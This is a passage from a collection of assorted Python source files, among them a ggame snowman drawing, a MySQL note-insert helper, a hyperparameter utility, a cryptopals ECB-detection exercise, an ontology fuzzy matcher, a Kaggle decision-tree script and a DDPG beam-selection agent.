ggame.\nSee:\nhttp://brythonserver.github.io/ggame/\nfor detailed information on ggame.\n\"\"\"\nfrom ggame import App, Color, LineStyle, Sprite, RectangleAsset, CircleAsset, EllipseAsset, PolygonAsset\n\n# add your code here \\/ \\/ \\/\n\n# colors\nred = Color(0xff0000, 1.0)\ngreen = Color(0x00ff00, 1.0)\nblue = Color(0x0000ff, .50)\nblack = Color(0x000000, 1.0)\nwhite = Color(0xffffff, 1.0)\nlight_blue = Color(0x0000ff, .05)\norange = Color(0xffa500, 1.0)\n\n# thin black line\nthinline = LineStyle(1, black)\n\n# background\nground_snow = RectangleAsset(1500, 275, thinline, blue)\n\n#the snowman body \nbase = CircleAsset (80, thinline, light_blue)\nmiddle = CircleAsset (50, thinline, light_blue)\nhead = CircleAsset (40, thinline, light_blue)\nnose = PolygonAsset([(0,0), (0,15), (30,12)], thinline, orange)\neyes = CircleAsset (5, thinline, black)\narm_left = PolygonAsset([(0,0), (15,5), (100,90), (100,100)], thinline, black)\narm_right = PolygonAsset([(210,0), (195,5), (100,90), (100,100)], thinline, black)\n\n#accessories \nhat_base = RectangleAsset(80, 20, thinline, black)\nhat_top = EllipseAsset(25, 28, thinline, black)\nbuttons = CircleAsset(5, thinline, black)\n\n# display\nSprite (ground_snow, (0,400))\nSprite (base, (350, 240))\nSprite (middle, (380, 140))\nSprite (head, (390, 60))\nSprite (nose, (430,100))\nSprite (eyes, (410, 80))\nSprite (eyes, (440, 80))\nSprite (arm_left, (280,100))\nSprite (arm_right, (480,100))\nSprite (hat_base, (390,40))\nSprite (hat_top, (405,4))\nSprite (buttons, (425,200))\nSprite (buttons, (425,180))\nSprite (buttons, (425,160))\n\n\n# add your code here /\\ /\\ /\\\n\n\nmyapp = App()\nmyapp.run()","sub_path":"picture.py","file_name":"picture.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483129571","text":"#!/usr/bin/python3\n\nfrom pymysqlhelper import PyMysqlHelper as mysqlhlper\n\ndef add_note(note_type, note_name, note_url, note_comment):\n\n db = mysqlhlper()\n sql_select_note_id = \"SELECT id FROM notetype WHERE type_name = '%s' limit 1\" % (note_type)\n results = db.select(sql_select_note_id)\n note_type_id = -1\n for row in results:\n note_type_id = row[0]\n sql_insert_one_note = \"INSERT INTO notes(note_type_id, note_name, note_url, note_comment) VALUES (%s, %s, %s, %s)\"\n params = (note_type_id, note_name, note_url, note_comment)\n db.update_by_param(sql_insert_one_note, params)\n\n db.close()\n","sub_path":"py/addnote.py","file_name":"addnote.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43476582","text":"# Copyright (c) Alibaba, Inc. and its affiliates.\n\nimport argparse\n\nimport json\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Unsupported value encountered.')\n\n\nclass HParams(dict):\n \"\"\" Hyper-parameters class\n\n Store hyper-parameters in training / infer / ... scripts.\n \"\"\"\n\n def __getattr__(self, name):\n if name in self.keys():\n return self[name]\n for v in self.values():\n if isinstance(v, HParams):\n if name in v:\n return v[name]\n raise AttributeError(f\"'HParams' object has no attribute '{name}'\")\n\n def __setattr__(self, name, value):\n self[name] = value\n\n def save(self, filename):\n with open(filename, 'w', encoding='utf-8') as fp:\n json.dump(self, fp, ensure_ascii=False, indent=4, sort_keys=False)\n\n def load(self, filename):\n with open(filename, 'r', encoding='utf-8') as fp:\n params_dict = json.load(fp)\n for k, v in params_dict.items():\n if isinstance(v, dict):\n self[k].update(HParams(v))\n else:\n self[k] = v\n\n\ndef parse_args(parser):\n \"\"\" Parse hyper-parameters from cmdline. \"\"\"\n parsed = parser.parse_args()\n args = HParams()\n optional_args = parser._action_groups[1]\n for action in optional_args._group_actions[1:]:\n arg_name = action.dest\n args[arg_name] = getattr(parsed, arg_name)\n for group in parser._action_groups[2:]:\n group_args = HParams()\n for action in group._group_actions:\n arg_name = action.dest\n group_args[arg_name] = getattr(parsed, arg_name)\n if len(group_args) > 0:\n args[group.title] = group_args\n return args\n","sub_path":"ai/modelscope/modelscope/utils/nlp/space/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"357833773","text":"def num_repeated_blocks(ciphertext,size):\r\n total_length = len(ciphertext)\r\n array = []\r\n if total_length % size == 0:\r\n num_of_blocks = total_length // size\r\n for i in range(num_of_blocks):\r\n array.append(ciphertext[i*size:(i+1)*size])\r\n return num_of_blocks - len(set(array))\r\n else:\r\n return -1\r\n\r\n\r\ndef main():\r\n f = open('8.txt')\r\n lines = f.readlines()\r\n f.close()\r\n ciphertexts = []\r\n for i in range(len(lines)):\r\n ciphertexts.append(bytes.fromhex(lines[i]))\r\n max_score = 0\r\n possible = ''\r\n for ciphertext in ciphertexts:\r\n score = num_repeated_blocks(ciphertext,16)\r\n if score > max_score:\r\n max_score = score\r\n possible = ciphertext\r\n print(possible)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"set1challenge8.py","file_name":"set1challenge8.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14278741","text":"import numpy as np\nimport pandas as pd\nfrom typing import Dict, List, Tuple, Union\n\nfrom sfaira.versions.metadata import OntologyCl, OntologyUberon\nfrom sfaira.versions.metadata.extensions import ONTOLOGIY_EXTENSION\n\nTARGET_UNIVERSE_KEY_NAME = \"name\"\nTARGET_UNIVERSE_KEY_ID = \"id\"\n\n\nclass CelltypeUniverse:\n \"\"\"\n Cell type universe (list) and ontology (hierarchy) container class.\n\n\n Basic checks on the organ specific instance are performed in the constructor.\n \"\"\"\n onto_cl: OntologyCl\n onto_uberon: OntologyUberon\n _target_universe: Union[List[str], None]\n\n def __init__(self, cl: OntologyCl, uberon: OntologyUberon, **kwargs):\n self.onto_cl = cl\n self.onto_uberon = uberon\n self._target_universe = None\n self._set_extension()\n\n def _set_extension(self):\n self.onto_cl.add_extension(ONTOLOGIY_EXTENSION)\n\n def __validate_target_universe_table(self, tab: pd.DataFrame):\n assert len(tab.columns) == 2\n assert tab.columns[0] == \"name\" and tab.columns[1] == \"id\"\n\n def load_target_universe(self, fn):\n \"\"\"\n\n :param fn: .csv file containing target universe.\n :return:\n \"\"\"\n tab = pd.read_csv(fn, sep=\"\\t\", index_col=None)\n self.__validate_target_universe_table(tab=tab)\n self.onto_cl.leaves = tab[\"name\"].values\n\n def write_target_universe(\n self,\n fn,\n x: List[str],\n ):\n \"\"\"\n\n :param fn: .csv file containing target universe.\n :param x: Nodes that make up target universe.\n :return:\n \"\"\"\n tab = pd.DataFrame({\n TARGET_UNIVERSE_KEY_NAME: self.onto_cl.convert_to_name(x),\n TARGET_UNIVERSE_KEY_ID: self.onto_cl.convert_to_id(x),\n })\n self.__validate_target_universe_table(tab=tab)\n tab.to_csv(path_or_buf=fn, sep=\"\\t\", index=False)\n\n def prepare_celltype_map_fuzzy(\n self,\n source,\n match_only: bool = False,\n include_synonyms: bool = True,\n anatomical_constraint: Union[str, None] = None,\n choices_for_perfect_match: bool = True,\n omit_list: list = [],\n omit_target_list: list = [\"cell\"],\n n_suggest: int = 4,\n threshold_for_partial_matching: float = 90.,\n ) -> Tuple[\n List[Dict[str, Union[List[str], str]]],\n List[bool]\n ]:\n \"\"\"\n Map free text node names to ontology node names via fuzzy string matching and return as list\n\n If this function does not yield good matches, consider querying this web interface:\n https://www.ebi.ac.uk/ols/index\n\n Search strategies:\n\n - exact_match: Only exact string matches to name or synonym in ontology. This is the only strategy that is\n enabled if match_only is True.\n - lenient_match: Fuzzy string matches to name or synonym in ontology based on ratio of match errors\n ((fuzz.ratio).\n - very_lenient_match: Fuzzy string matches to name or synonym in ontology based on ratio of matches\n characters from query (fuzz.partial_ratio)\n\n Search strategies with anatomical constraints:\n An anatomic constraint is a name of an anatomical structure that can be mapped to UBERON.\n\n - anatomic_onotolgy_match:\n We select cell types expected in this UBERON clade based on the link between CL and UBERON.\n - anatomic_string_match:\n We perform an additional fuzzy string matching with the anatomical structure added to the proposed\n label. This is often beneficial because analysts do not always prefix such extension (e.g. pancreatic)\n to the free text cell type labels if the entire sample consists only of cells from this anatomical\n structure. Note that if the maps from 1) were perfect, this would not be necessary. In practice, we\n find this to still recover some hits that are otherwise missed.\n\n Note that matches are shadowed in lower priorty strategies, ie a perfect match will not show up in the list\n of hits of any other strategy.\n\n :param source: Free text node labels which are to be matched to ontology nodes.\n :param match_only: Whether to include strict matches only in output.\n :param include_synonyms: Whether to include synonyms of nodes in string search.\n :param anatomical_constraint: Whether to require suggestions to be within a target anatomy defined\n within UBERON.\n :param choices_for_perfect_match: Whether to give additional matches if a perfect match was found and an\n anatomical_constraint is not not defined. This is overridden by match_only.\n :param omit_list: Free text node labels to omit in map.\n :param omit_target_list: Ontology nodes to not match to.\n :param n_suggest: Number of cell types to suggest per search strategy.\n :param threshold_for_partial_matching: Maximum fuzzy match score below which lenient matching (ratio) is\n extended through partial_ratio.\n :return: Tuple\n\n - List with matches for each source, each entry is a dictionary,\n of lists of search strategies named by strategy name. If a search strategy yields perfect matches, it\n does not return a list of strings but just a single string.\n - List with boolean indicator whether or not this output should be reported.\n \"\"\"\n from fuzzywuzzy import fuzz\n matches = []\n nodes = self.onto_cl.nodes\n nodes = [x for x in nodes if x[1][\"name\"] not in omit_target_list]\n include_terms = []\n if isinstance(source, pd.DataFrame):\n source = list(zip(source.iloc[:, 0].values, source.iloc[:, 1].values))\n for x in source:\n if not isinstance(x, list) and not isinstance(x, tuple):\n x = [x, \"nan\"]\n term = x[0].lower().strip(\"'\").strip(\"\\\"\").strip(\"'\").strip(\"\\\"\").strip(\"]\").strip(\"[\")\n # Test for perfect string matching:\n scores_strict = np.array([\n np.max(\n [\n 100 if term == y[1][\"name\"].lower() else 0\n ] + [\n 100 if term == yy.lower() else 0\n for yy in y[1][\"synonym\"]\n ]\n ) if \"synonym\" in y[1].keys() and include_synonyms else 100 if term == y[1][\"name\"].lower() else 0\n for y in nodes\n ])\n # Test for partial string matching:\n # fuzz ratio and partial_ratio capture different types of matches well, we use both here and decide below\n # which scores are used in which scenario defined through the user input.\n # Formatting of synonyms: These are richly annotated, we strip references following after either:\n # BROAD, EXACT\n # in the synonym string and characters: \"'\n\n def synonym_string_processing(y):\n return y.lower().split(\"broad\")[0].split(\"exact\")[0].lower().strip(\"'\").strip(\"\\\"\").split(\"\\\" \")[0]\n\n scores_lenient = np.array([\n np.max([fuzz.ratio(term, y[1][\"name\"].lower())] + [\n fuzz.ratio(term, synonym_string_processing(yy))\n for yy in y[1][\"synonym\"]\n ]) if \"synonym\" in y[1].keys() and include_synonyms else\n fuzz.ratio(term, y[1][\"name\"].lower())\n for y in nodes\n ])\n scores_very_lenient = np.array([\n np.max([fuzz.partial_ratio(term, y[1][\"name\"].lower())] + [\n fuzz.partial_ratio(term, synonym_string_processing(yy))\n for yy in y[1][\"synonym\"]\n ]) if \"synonym\" in y[1].keys() and include_synonyms else\n fuzz.partial_ratio(term, y[1][\"name\"].lower())\n for y in nodes\n ])\n include_terms.append(term not in omit_list)\n if match_only and not anatomical_constraint:\n # Explicitly trying to report perfect matches (match_only is True).\n matches.append({\"perfect_match\": [nodes[i][1][\"name\"] for i in np.where(scores_strict == 100)[0]][0]})\n else:\n matches_i = {}\n if np.any(scores_strict == 100) and not anatomical_constraint:\n # Perfect match and not additional information through anatomical_constraint, ie no reason to assume\n # that the user is not looking for this hit.\n matches_i.update({\n \"perfect_match\": [nodes[i][1][\"name\"] for i in np.where(scores_strict == 100)[0]][0]\n })\n if choices_for_perfect_match:\n matches_i.update({\n \"lenient_match\": [\n nodes[i][1][\"name\"] for i in np.argsort(scores_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n if np.max(scores_lenient) < threshold_for_partial_matching:\n matches_i.update({\n \"very_lenient_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_very_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n else:\n if anatomical_constraint is not None:\n # Use anatomical constraints two fold:\n # 1. Select cell types that are in the correct ontology.\n # 2. Run a second string matching with the anatomical word included.\n\n # 1. Select cell types that are in the correct ontology.\n # Check that anatomical constraint is a term in UBERON and get UBERON ID:\n anatomical_constraint_id = self.onto_uberon.convert_to_id(anatomical_constraint)\n # Select up to 5 nodes which match the anatomical constraint:\n # The entries look as follows:\n # node.value['relationship'] = ['part_of UBERON:0001885']\n # Find nodes that can be matched to UBERON:\n anatomical_subselection = [\n \"relationship\" in y[1].keys() and\n np.any([\"part_of UBERON\" in yy for yy in y[1][\"relationship\"]]) and\n np.any([\n yy.split(\"part_of \")[-1] in self.onto_uberon.node_ids\n for yy in y[1][\"relationship\"]\n ])\n for y in nodes\n ]\n uberon_ids = [\n y[1][\"relationship\"][\n np.where([\"part_of UBERON\" in yy for yy in y[1][\"relationship\"]])[0][0]\n ].split(\"part_of \")[1]\n if z else None\n for y, z in zip(nodes, anatomical_subselection)\n ]\n # Check relationship in UBERON. Select for:\n # a) parent -> a more general setting across anatomies from which one was sampled\n # b) child -> a sub anatomy of the sampled tissue.\n # Check this by checking if one is an ancestor of the other:\n anatomical_subselection = [\n z and (\n anatomical_constraint_id in self.onto_uberon.get_ancestors(node=y) or\n y in self.onto_uberon.get_ancestors(node=anatomical_constraint_id)\n )\n for y, z in zip(uberon_ids, anatomical_subselection)\n ]\n # Iterate over nodes sorted by string match score and masked by constraint:\n matches_i.update({\n \"anatomic_onotolgy_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_lenient)\n if anatomical_subselection[i] and not\n np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][-n_suggest:][::-1]\n })\n\n # 2. Run a second string matching with the anatomical word included.\n modified_term = anatomical_constraint + \" \" + x[0].lower().strip(\"'\").strip(\"\\\"\").strip(\"]\"). \\\n strip(\"[\")\n scores_anatomy = np.array([\n np.max([\n fuzz.partial_ratio(modified_term, y[1][\"name\"].lower())\n ] + [\n fuzz.partial_ratio(modified_term, synonym_string_processing(yy))\n for yy in y[1][\"synonym\"]\n ]) if \"synonym\" in y[1].keys() and include_synonyms else\n fuzz.partial_ratio(modified_term, y[1][\"name\"].lower())\n for y in nodes\n ])\n matches_i.update({\n \"anatomic_string_match\": [\n nodes[i][1][\"name\"] for i in np.argsort(scores_anatomy)\n if nodes[i][1][\"name\"] and not\n np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][-n_suggest:][::-1]\n })\n\n # Select best overall matches based on lenient and strict matching:\n matches_i.update({\n \"perfect_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_strict)[::-1]\n ][:n_suggest]\n })\n matches_i.update({\n \"lenient_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n if np.max(scores_lenient) < threshold_for_partial_matching:\n matches_i.update({\n \"very_lenient_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_very_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n else:\n # Suggest top hits by string match:\n matches_i.update({\n \"lenient_match\": [\n nodes[i][1][\"name\"] for i in np.argsort(scores_lenient)[::-1]\n ][:n_suggest]\n })\n if np.max(scores_lenient) < threshold_for_partial_matching:\n matches_i.update({\n \"very_lenient_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_very_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n matches.append(matches_i)\n return matches, include_terms\n\n def prepare_celltype_map_tab(\n self,\n source,\n match_only: bool = False,\n include_synonyms: bool = True,\n anatomical_constraint: Union[str, None] = None,\n omit_list: list = [],\n n_suggest: int = 10,\n separator_suggestions: str = \":\",\n separator_groups: str = \":|||:\",\n ) -> pd.DataFrame:\n \"\"\"\n Map free text node names to ontology node names via fuzzy string matching and return as matching table.\n\n :param source: Free text node labels which are to be matched to ontology nodes.\n :param match_only: Whether to include strict matches only in output.\n :param include_synonyms: Whether to include synonyms of nodes in string search.\n :param anatomical_constraint: Whether to require suggestions to be within a target anatomy defined within\n UBERON.\n :param omit_list: Free text node labels to omit in map.\n :param n_suggest: Number of cell types to suggest per search strategy.\n :param separator_suggestions: String separator for matches of a single strategy in output target column.\n :param separator_groups: String separator for search strategy grouped matches in output target column.\n :return: Table with source and target node names. Columns: \"source\", \"target\"\n \"\"\"\n matches, include_terms = self.prepare_celltype_map_fuzzy(\n source=source,\n match_only=match_only,\n include_synonyms=include_synonyms,\n anatomical_constraint=anatomical_constraint,\n choices_for_perfect_match=False,\n omit_list=omit_list,\n n_suggest=n_suggest,\n )\n tab = pd.DataFrame({\n \"source\": source,\n \"target\": [\n separator_groups.join([\n separator_suggestions.join(v)\n if isinstance(v, list) else v\n for v in x.values()\n ])\n for x in matches\n ]\n })\n return tab.loc[include_terms]\n","sub_path":"sfaira/versions/metadata/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":18445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534135161","text":"# %%\n# 数据准备\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.tree import DecisionTreeRegressor\nimport pandas as pd\nimport os\n\nmelbourne_file_path = os.path.dirname(__file__) + '/melb_data.csv'\n\nmelbourne_data = pd.read_csv(melbourne_file_path)\n\n# dropna drops missing values (think of na as \"not available\")\nmelbourne_data = melbourne_data.dropna(axis=0)\ny = melbourne_data.Price\n\nmelbourne_features = ['Rooms', 'Bathroom',\n 'Landsize', 'Lattitude', 'Longtitude']\nX = melbourne_data[melbourne_features]\ntrain_X, val_X, train_y, val_y = train_test_split(X, y, random_state=0)\n\nprint(\"Set up Done!\")\n\n# %%\n# 模型1,决策树\n\n\ndef get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y):\n model = DecisionTreeRegressor(\n max_leaf_nodes=max_leaf_nodes, random_state=0)\n model.fit(train_X, train_y)\n preds_val = model.predict(val_X)\n mae = mean_absolute_error(val_y, preds_val)\n return(mae)\n\n\n# for max_leaf_nodes in [5, 50, 500, 5000]:\n# my_mae = get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y)\n# print(\"Max leaf nodes: %d \\t\\t Mean Absolute Error: %d\" %\n# (max_leaf_nodes, my_mae))\n\n[(x, get_mae(x, train_X, val_X, train_y, val_y)) for x in [5, 50, 500, 5000]]\n\n# %%\n","sub_path":"DataScience/Kaggle/HoursePrice/kaggle-tree.py","file_name":"kaggle-tree.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393641028","text":"\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\n\nfrom model import (SubActionActor, SubActionActorParallel, SubActionCritic, SubActionCriticParallel)\nfrom memory import SequentialMemory,BeamSpaceSubActionSequentialMemory\nfrom random_process import OrnsteinUhlenbeckProcess\nfrom util import *\n\n\n# device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# from ipdb import set_trace as debug\n\ncriterion = nn.MSELoss()\n\n\nclass SubAction_DDPG(object):\n def __init__(self, nb_states, nb_actions, args):\n self.seed = args.seed\n if self.seed > 0:\n self.seed(self.seed)\n\n self.nb_states = nb_states\n self.nb_actions= nb_actions\n self.num_beams_per_UE = args.num_beams_per_UE\n self.num_measurements = args.num_measurements\n self.window_length = args.window_length\n# self.combine_state = args.combine_state \n # Create Actor and Critic Network\n # self.actor = Actor(self.nb_states, self.nb_actions, **net_cfg)\n # self.actor_target = Actor(self.nb_states, self.nb_actions, **net_cfg)\n # self.actor_optim = Adam(self.actor.parameters(), lr=args.prate)\n\n # self.critic = Critic(self.nb_states, self.nb_actions, **net_cfg)\n # self.critic_target = Critic(self.nb_states, self.nb_actions, **net_cfg)\n # self.critic_optim = Adam(self.critic.parameters(), lr=args.rate)\n \n self.actor = SubActionActorParallel(self.nb_states, self.nb_actions, self.window_length, self.num_measurements).to(device)\n self.actor_target = SubActionActorParallel(self.nb_states, self.nb_actions, self.window_length, self.num_measurements).to(device)\n self.actor_optim = Adam(self.actor.parameters(), lr=args.prate)\n \n self.critic = SubActionCriticParallel(self.nb_states, self.nb_actions, self.window_length, self.num_measurements).to(device)\n self.critic_target = SubActionCriticParallel(self.nb_states, self.nb_actions, self.window_length, self.num_measurements).to(device)\n self.critic_optim = Adam(self.critic.parameters(), lr=args.rate)\n\n hard_update(self.actor_target, self.actor) # Make sure target is with the same weight\n hard_update(self.critic_target, self.critic)\n \n #Create replay buffer\n # self.memory = SequentialMemory(limit=args.rmsize, window_length=args.window_length)\n self.memory = BeamSpaceSubActionSequentialMemory(limit=args.rmsize, window_length=self.window_length, num_measurements=self.num_measurements)\n self.random_process = OrnsteinUhlenbeckProcess(size=self.actor.outshape, theta=args.ou_theta, mu=args.ou_mu, sigma=args.ou_sigma)\n\n # Hyper-parameters\n self.batch_size = args.bsize\n self.tau = args.tau\n self.discount = args.discount\n self.depsilon = 1.0 / args.epsilon\n\n # \n self.epsilon = 1.0\n self.ob_t = None # Most recent observation\n self.a_t = None # Most recent action\n self.is_training = True\n self.debug = args.debug\n self.actor_lambda = args.actor_lambda\n self.policy_update_counter = 0\n self.training_log = {'critic_mse':[],'actor_mse':[],'actor_value':[],'actor_total':[]}\n\n # \n # if USE_CUDA: self.cuda()\n\n def update_policy(self):\n # Sample batch\n state_batch, action_batch, subaction_rewards_batch, reward_batch, \\\n next_state_batch, terminal_batch = self.memory.sample_and_split(self.batch_size)\n\n # Prepare for the target q batch\n with torch.no_grad():\n next_states = torch.from_numpy(next_state_batch).type(torch.FloatTensor).to(device)\n target_actor_output = self.actor_target(next_states) \n # next_actions = torch.from_numpy(self.pick_beams_batch(to_numpy(predicted_beam_qual_target)))\n next_actions = self.actor_target.select_beams(to_numpy(target_actor_output), self.num_beams_per_UE)\n next_subq_values, next_q_values = self.critic_target([next_states,next_actions])\n # next_q_values.volatile=False\n next_subq_values.requires_grad = True\n next_q_values.requires_grad = True\n \n target_subq_batch = torch.from_numpy(subaction_rewards_batch).to(device) + \\\n self.discount*torch.from_numpy(terminal_batch.astype(np.float)).to(device)*next_q_values.expand(-1, self.nb_actions)/self.num_beams_per_UE\n \n target_q_batch = torch.from_numpy(reward_batch).to(device) + \\\n self.discount*torch.from_numpy(terminal_batch.astype(np.float)).to(device)*next_q_values\n\n # Critic update\n self.critic.zero_grad()\n subq_batch, q_batch = self.critic([torch.from_numpy(state_batch).type(torch.FloatTensor).to(device), action_batch])\n subvalue_loss = criterion(subq_batch, target_subq_batch)\n # subvalue_loss = torch.tensor(0)\n value_loss = criterion(q_batch, target_q_batch)\n # total_loss = 0.5*subvalue_loss + 0.5*value_loss\n total_loss = subvalue_loss\n # print(value_loss.item())\n total_loss.backward()\n self.training_log['critic_mse'].append([value_loss.item(),subvalue_loss.item()])\n self.critic_optim.step()\n\n # Actor update\n self.actor.zero_grad()\n \n # Beam qual prediction loss, only if using MSE of actor output\n states = torch.from_numpy(state_batch).type(torch.FloatTensor).to(device)\n actor_output = self.actor(states)\n # predicted_beam_qual = self.actor(states)\n # broadcasted_action_batch = np.expand_dims(action_batch, axis=1)\n # broadcasted_action_batch = np.repeat(broadcasted_action_batch, self.num_measurements, axis=1)\n # actor_output_masked = torch.mul(actor_output, to_tensor(broadcasted_action_batch))\n # true_beam_qual = to_tensor(next_state_batch[:,-self.num_measurements:,:])\n # actor_output_loss = criterion(actor_output_masked,true_beam_qual) \n # self.training_log['actor_mse'].append(actor_output_loss.item())\n \n # Value loss\n # actions = torch.from_numpy(self.pick_beams_batch(to_numpy(predicted_beam_qual)))\n actions = self.actor.select_beams(to_numpy(actor_output),self.num_beams_per_UE)\n subaction_policy_loss, policy_loss = self.critic([states,actions])\n policy_loss = -policy_loss.mean()\n self.training_log['actor_value'].append(policy_loss.item())\n policy_loss.backward()\n \n \n # # Combine actor output MSE and -value from critic\n # total_loss = (1-self.actor_lambda)*policy_loss + self.actor_lambda * actor_output_loss\n # self.training_log['actor_total'].append(total_loss.item())\n # total_loss.backward()\n \n #take a gradient step\n self.actor_optim.step()\n # if self.debug and self.policy_update_counter % 20 == 0:\n # print('Critic Loss: {}. Actor Prediction Loss: {}. Actor Policy Loss: {}'.format(value_loss.item(), beam_qual_prediction_loss.item(),policy_loss.item()))\n # Target update\n soft_update(self.actor_target, self.actor, self.tau)\n soft_update(self.critic_target, self.critic, self.tau)\n self.policy_update_counter += 1\n\n def eval(self):\n self.actor.eval()\n self.actor_target.eval()\n self.critic.eval()\n self.critic_target.eval()\n\n def cuda(self):\n self.actor.cuda()\n self.actor_target.cuda()\n self.critic.cuda()\n self.critic_target.cuda()\n\n def observe(self, subaction_r_t, r_t, ob_t1, done):\n# if self.is_training:\n# if self.combine_state:\n# combined_s_t = np.concatenate((self.ob_t, self.a_t), axis=0)\n# print(self.a_t)\n# self.memory.append(combined_s_t, self.a_t, r_t, done)\n# else:\n# self.memory.append(self.ob_t, self.a_t, r_t, done)\n# self.ob_t = ob_t1\n if self.is_training:\n self.memory.append(self.ob_t, self.a_t, subaction_r_t, r_t, done)\n self.ob_t = ob_t1\n \n def random_action(self):\n action = np.random.uniform(-1.,1.,self.nb_actions)\n binary_action = np.zeros(self.nb_actions)\n binary_action[np.argsort(action)[-self.num_beams_per_UE:]]=1\n self.a_t = binary_action\n return binary_action\n\n # def select_action(self, s_t, decay_epsilon=True):\n # action = to_numpy(\n # self.actor(to_tensor(np.array([s_t])))\n # ).squeeze(0)\n # action += self.is_training*max(self.epsilon, 0)*self.random_process.sample()\n # action = np.clip(action, -1., 1.)\n\n # if decay_epsilon:\n # self.epsilon -= self.depsilon\n \n # self.a_t = action\n # return action\n \n # a modified implementation of selection_action that enables window_length > 1\n def select_action(self, observation, decay_epsilon=True):\n with torch.no_grad():\n # s_t = self.memory.get_recent_state(np.concatenate((observation, self.a_t),axis=0))\n s_t = self.memory.get_recent_state(observation)\n #remove existing empty dimension and add batch dimension \n s_t_array = np.array([np.squeeze(np.array(s_t))])\n s_t_array_tensor = torch.from_numpy(s_t_array).type(torch.FloatTensor).to(device)\n actor_output = to_numpy(self.actor(s_t_array_tensor)) #bsize(1) x actor_output_shape\n actor_output += self.is_training*max(self.epsilon, 0)*self.random_process.sample()\n action = self.actor.select_beams(actor_output, self.num_beams_per_UE).squeeze(0)\n # action = to_numpy(\n # self.actor(to_tensor(np.array([s_t])))\n # ).squeeze(0)\n # action = np.clip(action, -1., 1.)\n \n if decay_epsilon:\n self.epsilon -= self.depsilon\n \n self.a_t = action\n return action\n \n # def pick_beams(self, observation:np.ndarray):\n # #observation is batchsize x num_measurements x num_beams matrix, iteratively pick best beam\n # selected_beams = np.argsort(np.sum(observation,axis=0))[-self.num_beams_per_UE:]\n # binary_beams = np.zeros(self.nb_actions)\n # binary_beams[selected_beams] = 1\n \n # # selected_beams = []\n # # pool = list(np.arange(self.nb_actions))\n # # sum_tp = np.sum(observation,axis=0)\n # # sel_beam = np.argmax(sum_tp)\n # # selected_beams.append(sel_beam)\n # # pool.remove(sel_beam)\n \n # # for it_idx in range(self.num_beams_per_UE):\n # # sum_tp = np.sum(observation[pool,:],axis=0)\n # # sel_beam = np.argmax(sum_tp)\n # # selected_beams.append(sel_beam)\n # # pool.remove(sel_beam)\n \n # return binary_beams\n \n # def pick_beams_batch(self, observation:np.ndarray):\n # assert(observation.shape[0] == self.batch_size)\n # binary_beams = np.zeros((self.batch_size, self.nb_actions))\n # for i in range(self.batch_size):\n # binary_beams[i,:] = self.pick_beams(observation[i])\n # return binary_beams\n # def reset(self, obs):\n # self.ob_t = obs\n # self.random_process.reset_states()\n \n # modified reset() function that also takes in initial beam config\n def reset(self, obs):\n self.ob_t = obs\n # self.a_t = beams\n self.random_process.reset_states()\n # self.policy_update_counter = 0\n # self.training_log = {'critic_mse':[],'actor_mse':[],'actor_value':[],'actor_total':[]}\n\n def load_weights(self, output):\n if output is None: return\n\n self.actor.load_state_dict(\n torch.load('{}/actor.pkl'.format(output))\n )\n\n self.critic.load_state_dict(\n torch.load('{}/critic.pkl'.format(output))\n )\n\n\n def save_model(self,output):\n torch.save(\n self.actor.state_dict(),\n '{}/actor.pkl'.format(output)\n )\n torch.save(\n self.critic.state_dict(),\n '{}/critic.pkl'.format(output)\n )\n\n def seed(self,s):\n torch.manual_seed(s)\n if USE_CUDA:\n torch.cuda.manual_seed(s)\n","sub_path":"SubActionDDPG.py","file_name":"SubActionDDPG.py","file_ext":"py","file_size_in_byte":12289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"107548505","text":"import torch\nimport torchvision\nimport os\nimport glob\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nfrom myflownet import MyFlownetS\nimport numpy as np\nimport PIL.Image\nimport moving_average as ma\n\nOXTS_DIR='oxts/data'\nIMAGE_DIR='image_02/data'\n\nIDX_VN = 6\nIDX_VE = 7\nIDX_VF = 8\nIDX_VL = 9\nIDX_VU = 